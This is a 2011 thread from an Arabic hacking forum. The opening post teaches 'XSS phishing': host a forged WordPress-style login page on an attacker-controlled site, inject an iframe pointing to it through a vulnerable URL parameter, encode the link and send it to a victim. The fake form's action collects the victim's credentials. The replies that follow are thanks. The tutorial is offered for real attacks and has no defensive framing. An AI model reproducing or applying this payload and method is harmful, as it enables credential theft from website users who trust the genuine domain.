:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   حقن xss - ssi (http://www.vbspiders.com/vb/f427.html)
-   -   جديد استخدامات xss وهي الـ phishing login (http://www.vbspiders.com/vb/t58378.html)

JetLi 09-10-2011 03:33 PM

جديد استخدامات xss وهي الـ phishing login
 
السلام عليكم
هذا استخدام غير معروف لثغرة xss:2:
تعبت في عمل الفيديو والشرح راجاء اعمل تقييم ويمنتنع رودوم من نوع شكراً
الفكرة تعتمد على الدمج بين الصفحات المزورة واترككم مع الفيديو خخخخخخخ
حمل الفيديو من هنا

تحميييييل


~~~~~~~~~~~~~~~~~~~~

~

بسم الله الرحمن الرحيم
السلام عليكم

معكم IronMan من
شبكة العناكب الاحترافية

درسنا اليوم هو عن استغلال شبه غير معروف عن ثغرة XSS وهو XSS phishing
اي الخداع عن طريق هذه الثغرة، طبعا الكل يعرف سرقة الكوكيز ولكن لماذا
لان نستخدم هذه الثغرة في حقن اكواد HTML في الصفحة؟
سنرى الطريقة تابعوا معي

هذا كود بسيط نصبته في local server وصنعت ثغرة xss بسيطة المتغير المصاب هو x قبل ما نحقنه نشوف عدة خطوات وهي انك ترفع صفحة مزورة على موقع ثاني لنقل

httP://mysite.com/phishing.php

لازم تكون من نفس لوحة التحكم للسكربت الحابي تخترقه يعني مثال ويرد برس

نأتي الان لخطوة الحقن وهي استخدام هذا الكود

<****** frameborder=0 src=http://www.yoursite.com/wp-login.php? height=700px width=1250px ></******>

لاحظ رابط الصفحة المزورة يجب ان تتأكد منه وتعدل ه بما يناسبك

لازم تظبط ابعاد الصفحة قبل ما ترسلها يعني صفحة ملغمة
لا تنسى انه كود form action يرسل البيانات لك او يحفظها تقريبا شبيه بخطوات حفظ الكوكيز ، المهم
عندما نحقن الكود اعلاه في الصفحة ستظهر لوحة التحكم ويمكنك ارسالها للمستهدف ، بعد ما تشفر الكود الاخير بأي اداة من ادوات hackbar
تلك لاضافة في الفاير فوكس
ابحث عنها في قوقل ولا تكون كسلان


وليصبح الرابط في النهاية

http://localhost/mblue_u/test.php?x=...E%3C/******%3E

وبكذا ترسلوا الرابط للضحية
او تتفننوا علي كيفيكم مثل ما تسرقون الكوكيز يمكنك ان تصنع صفحة مزورة بهذه الطريقة ول ايشك ابدا حتى لو نظر للعنوان سيجد انه في الموقع
وبكذا انتهى



الدرس
اخوكم / ايرون مان هكر
شبكة العناكب الاحترافية
vbspiders.com/vb/



bleu moon 09-10-2011 06:52 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
هههه عملت الفيديوا اذن ...
بارك الله فيك ...
لي عوده ...

bleu moon 09-10-2011 07:02 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
ينقل الى مرجع تغرات xss

http://www.vbspiders.com/vb/t58067-p...tml#post388177

agentsimo 09-10-2011 07:03 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
thxxxx

JetLi 09-10-2011 07:09 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
لكن كذا دفنت الموضوع كان تتركه اسبوع

bleu moon 09-10-2011 07:13 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
هيك احسن هههه

JetLi 09-11-2011 07:58 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
نو نو ما احسن ولا شيء هذا يعتبر دمج ما بين قسم البريد واختراق المواقع ههههه

hiplorenzo 10-13-2011 03:04 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
nice merci bcp

msbhacker 10-16-2011 02:41 AM

رد: جديد استخدkمات xss وهي الـ phishing login
 
thanks u very much

samourai_7 10-18-2011 12:10 AM

رد: جديد استخدامات xss وهي الـ phishing login
 
شـكــ وبارك الله فيك ـــرا لك

يحيى زكريا 10-24-2011 01:21 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
موضوع اكثر من رائع

RyaX 11-14-2011 02:00 AM

رد: جديد استخدامات xss وهي الـ phishing login
 
ماد لو حطية باتش بدل الصفح

دام علاء العماد 11-14-2011 10:31 AM

رد: جديد استخدامات xss وهي الـ phishing login
 
بارك الله فيك يا أخي الكريم على هذا الدرس القيم و جزاك الله عنا خير الجزاء

bigotoo 12-05-2011 06:20 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
مشكـــــور تسلم ثغرة حلوة

dal3_3ny 12-07-2011 07:53 PM

رد: جديد استخدامات xss وهي الـ phishing login
 
thanxxxxxxxxxxxxxxxxxx


الساعة الآن 02:41 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0